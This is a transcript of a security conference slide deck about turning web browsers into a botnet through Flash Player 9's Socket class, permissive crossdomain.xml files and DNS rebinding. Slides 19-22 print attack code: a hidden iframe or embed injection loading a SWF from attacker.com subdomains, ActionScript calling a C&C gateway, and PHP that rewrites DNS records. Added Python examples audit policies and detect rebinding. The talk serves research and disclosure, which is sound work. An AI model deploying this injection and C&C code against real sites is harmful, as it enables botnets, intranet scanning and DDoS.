Zombilizing The Web Browser Via Flash Player 9
This paper talks about how hackers can exploit Flash Player 9's weaknesses to build a botnet that launches malicious attacks against intranets and the Internet.

Published in: Technology
1. Zombilizing The Web Browser Via Flash Player 9
   - Thai N. Duong
   - <thaidn AT gmail DOT com>
   - http://vnhacker.blogspot.com

2. Overview
   - Flash Player 9 and its potential weaknesses
     - Socket class
     - Breaking the same-origin policy using crossdomain.xml and DNS Spoofing
   - Exploiting the weaknesses
     - Introducing FlashBot
     - Demo
   - Workarounds
3-5. Flash Player 9 Socket class
   - Quote from the Flash 9 documentation:
     "The Socket class enables ActionScript code to make socket connections and to read and write raw binary data. The Socket class is useful for working with servers that use binary protocols."
   - Let's port nmap to ActionScript!
     - Err, wait, how about the same-origin policy?
6. Same-Origin Policy
   - originally released with Netscape Navigator 2.0 and has been incorporated into every major browser since
   - prevents a document or script loaded from one site of origin from manipulating properties of, or communicating with, a document loaded from another site of origin
   - origin = domain name + port + protocol

7. Same-Origin Policy

8. Flash Player 9 Same-Origin Policy
9. Breaking the SOP: crossdomain.xml
   - A SWF file from a.com may read from the server at b.com (using the Socket class, for example) if b.com has a cross-domain policy file that permits access from a.com (or from all domains):

         <?xml version="1.0"?>
         <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
         <cross-domain-policy>
           <allow-access-from domain="*" to-ports="*" />
         </cross-domain-policy>

   - Yahoo! - http://api.search.yahoo.com/crossdomain.xml
   - YouTube - http://www.youtube.com/crossdomain.xml
   - Amazon.com - http://www.amazon.com/crossdomain.xml
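Added example, not from the talk: a small audit script that parses a policy file like the one above and reports the settings that let SWFs from any origin open Socket connections to any port. Both sample policies are constructed; the wildcard one mirrors the slide.

```python
# Added example (not from the talk): audit a Flash cross-domain policy file for the
# over-permissive settings quoted on the slide. Standard library only.
import xml.etree.ElementTree as ET

# Constructed sample: the wildcard policy shown on the slide.
WILDCARD_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>"""

# Constructed sample: a scoped policy that opens only port 80 to one partner host.
SCOPED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="partner.example.net" to-ports="80" />
</cross-domain-policy>"""


def audit_policy(xml_text):
    """Return a list of findings (strings), one per risky <allow-access-from> setting."""
    findings = []
    root = ET.fromstring(xml_text)
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        ports = rule.get("to-ports", "")
        if domain == "*":
            findings.append("any-domain: SWFs from every origin may read this host")
        elif domain.startswith("*."):
            findings.append("wildcard-subdomain: %s" % domain)
        if ports == "*":
            findings.append("any-port: Socket connections allowed to every TCP port")
        elif ports and any(p.strip() not in ("80", "443") for p in ports.split(",")):
            findings.append("non-web-ports: %s" % ports)
    return findings


if __name__ == "__main__":
    for name, policy in (("wildcard", WILDCARD_POLICY), ("scoped", SCOPED_POLICY)):
        print(name, audit_policy(policy) or ["ok"])
```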
10-12. DNS Pinning Explained
   - same-origin policy
   - origin = domain name + port + protocol
   - DNS is not static, and host names could potentially resolve to different addresses over the course of a browsing session. Dynamic DNS, anybody?
   - Browsers use DNS pinning to prevent attackers from manipulating DNS timeouts to their advantage. DNS pinning means that once an address is returned for a host name, it is used for the duration of the browsing session, regardless of the DNS timeout associated with the domain.
   - fact: Flash Player does not pin DNS at all.
13-17. Breaking the SOP: DNS Spoofing
   - The user loads a SWF file from www.attacker.com and performs a DNS lookup for that hostname, receiving 222.222.222.222 with a TTL of one second.
   - ActionScript in the SWF file tells the Flash Player to connect back to www.attacker.com after two seconds, shortly after the TTL has expired.
   - Since the DNS record is no longer valid, the user's Flash Player connects to the DNS server to ask where www.attacker.com is now located.
   - The DNS server, controlled by the attackers, responds with 111.111.111.111, which points to www.example.com.
   - The SWF file located on www.attacker.com now has full access to www.example.com.
18. FlashBot 101
   - a 130KB SWF file written in ActionScript 3.0 that works on all web browsers supporting Flash Player 9
   - once loaded in a victim's web browser, FlashBot can leverage the victim's computer to execute commands received from a C&C server
   - commands that FlashBot understands:
     - port scanning
     - socket relaying (i.e., to send shellcode)
     - launching web DDoS attacks
19. How FlashBot works
   - FlashBot is secretly inserted into www.example.com via JavaScript or an iframe:

         function source() {
             // a fresh random subdomain on every load, so each victim gets its own DNS name
             return "http://" + Math.random().toString().substr(2) + "." + "attacker.com/flashbot.swf";
         }
         document.write('<object width="1" height="1">');
         document.write('<embed src="' + source() + '" type="application/x-shockwave-flash" width="1" height="1">');
         document.write('</embed></object>');
20. How FlashBot works
   - Victim visits www.example.com to load FlashBot from http://<random-subdomain>.attacker.com/flashbot.swf
   - ActionScript in FlashBot connects back to the C&C server:

         private function getCommand(subdomain:String, domain:String):void {
             var cnc:String = "http://cnc" + "." + domain;
             var connection:NetConnection = new NetConnection();
             connection.connect(cnc + "/flashservices/gateway.php");
             // responder: the Responder object that receives the C&C reply (defined elsewhere in FlashBot)
             connection.call("FlashBot.getCommand", responder, subdomain, domain);
         }
21. How FlashBot works
   - C&C server sends to FlashBot a command which is associated with a target IP address
   - C&C server automatically updates the DNS server (powered by PowerDNS) to map the subdomain of the victim to the target IP address:

         // PowerDNS MySQL backend, records table: (id, domain_id, name, type, content, ttl, prio, change_date)
         $query = "SELECT 1 FROM records WHERE name = '$record_name'";
         $result = mysql_query($query);
         if ( mysql_num_rows($result) ) {
             $query = "UPDATE records SET content='$ip' WHERE name='$record_name'";
         }
         else {
             // A record with a 6-second TTL, so the victim's next lookup expires quickly
             $query = "INSERT INTO records VALUES (NULL, 2, '$record_name', 'A', '$ip', '6', NULL, NULL)";
         }
22. How FlashBot works
   - ActionScript in FlashBot waits for the DNS information to expire:

         timer1 = new Timer( 10 * 1000, 1 );   // fire once after 10 seconds, past the record's TTL
         timer1.addEventListener( TimerEvent.TIMER, exeCommand );
         timer1.start();

   - FlashBot executes the command and (optionally) sends the result back to the C&C server; then the whole process starts over.
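Added example, not from the talk, covering the DNS spoofing sequence on slides 13-17 and the C&C-driven record update on slides 21-22: a resolver that pins the first answer for a name the way browsers do, replayed against the same sequence with pinning disabled (Flash Player 9's behaviour), and that flags any answer moving a public name onto a loopback, private or link-local address. The intranet target 10.0.0.5 is a constructed value; the other addresses are the slide's.

```python
# Added example (not from the talk): a pinning resolver plus a rebinding detector.
# Feed it the DNS answers a client observes; it returns the address the client
# should actually use and records when a public name rebinds to a non-public one.
import ipaddress


class PinningResolver:
    def __init__(self):
        self.pins = {}      # name -> first address seen this session
        self.alerts = []    # human-readable rebinding findings

    def resolve(self, name, answer_ip, ttl, pin=True):
        """Record one observed answer; return the address the client should connect to."""
        ip = ipaddress.ip_address(answer_ip)
        if name not in self.pins:
            self.pins[name] = ip
            return str(ip)
        pinned = self.pins[name]
        # A public name that suddenly answers with an intranet/loopback address is the
        # signature of the rebinding attack, whatever the record's TTL says.
        if ip != pinned and pinned.is_global and not ip.is_global:
            self.alerts.append(
                "%s: %s -> %s (ttl=%d) rebinds to a non-public address" % (name, pinned, ip, ttl))
        if pin:
            return str(pinned)  # browser behaviour: keep the pinned address for the session
        self.pins[name] = ip    # Flash Player 9 behaviour: honour the new answer
        return str(ip)


def replay(pin):
    """Replay the slide's answers, then the intranet case the demos target."""
    r = PinningResolver()
    first = r.resolve("www.attacker.com", "222.222.222.222", ttl=1, pin=pin)
    second = r.resolve("www.attacker.com", "111.111.111.111", ttl=1, pin=pin)
    third = r.resolve("www.attacker.com", "10.0.0.5", ttl=6, pin=pin)  # constructed intranet target
    return first, second, third, r.alerts


if __name__ == "__main__":
    for mode, pin in (("browser (pinned)", True), ("Flash Player 9 (unpinned)", False)):
        print(mode, replay(pin))
```

With pinning the client keeps talking to 222.222.222.222 for the whole session; without it the third lookup hands the SWF an intranet address, which is exactly the event the alert records.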
23. Show Time!
   - set your DNS server to 221.133.4.24
   - start Wireshark to see what you send out!

24. Demo 1: port scanning
   - works on Firefox
   - scan 127.0.0.1
   - scan all other hosts in the same subnet as the victim
   - http://www.example.com/scanport.html

25. Demo 2: socket relaying
   - works on all browsers supporting Flash Player 9
   - relay socket connections to any IP address in intranets and on the Internet
   - can be used to send shellcode, send spam mail, or launch DDoS attacks
   - http://www.example.com/relay.html

26. Workarounds
   - disable Flash Player (and all other plugins) in your web browser.
   - still want to watch youtube.com? use Firefox + NoScript + FlashBlock
   - restrict browser access to only ports 80 and 443 using a personal firewall

27. Thanks
   - DAB Security Team
   - VNSecurity Team, esp. rd and aquynh
   - http://christ1an.blogspot.com
   - http://www.jumperz.net
   - theresacow: I owe you a hug ;).

28. Zombilizing The Web Browser Via Flash Player 9
   - Thank you!
   - Questions/Comments?
   Thai N. Duong